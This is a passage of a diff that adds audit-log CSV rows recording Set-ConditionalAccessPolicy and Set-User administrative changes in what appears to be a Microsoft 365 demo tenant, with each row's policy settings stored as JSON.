+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:01:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:01:56 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:02:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:02:25 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:01:23Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:00:38.9140548Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:01:22 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T18:15:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 6:15:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T18:28:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:44:09.233453Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 6:28:30 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T18:29:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:44:09.233453Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 6:29:33 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T18:29:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:44:09.233453Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 6:29:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T18:28:22Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:44:09.233453Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 6:28:21 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:29:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:29:25 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:29:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:29:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:31:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:31:35 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:29:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:29:09 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:29:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:29:14 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:29:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:29:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T19:29:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 7:29:13 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T21:50:23Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\73b07c2f-ef9f-4b21-9e02-c0b1013c09c4""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 9:50:23 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T21:50:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\73b07c2f-ef9f-4b21-9e02-c0b1013c09c4""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 9:50:23 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T21:50:22Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\73b07c2f-ef9f-4b21-9e02-c0b1013c09c4""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 9:50:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-07T21:50:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\73b07c2f-ef9f-4b21-9e02-c0b1013c09c4""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/7/2020 9:50:16 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T16:14:21Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-16T19:01:47Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T20:15:28Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T21:23:49Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T21:23:49Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T19:29:43Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-16T21:01:08Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T15:22:06Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T15:22:05Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T21:44:00Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T18:11:42Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T13:00:25Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-15T17:48:28Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-15T11:46:47Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-15T22:53:37Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-16T06:05:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
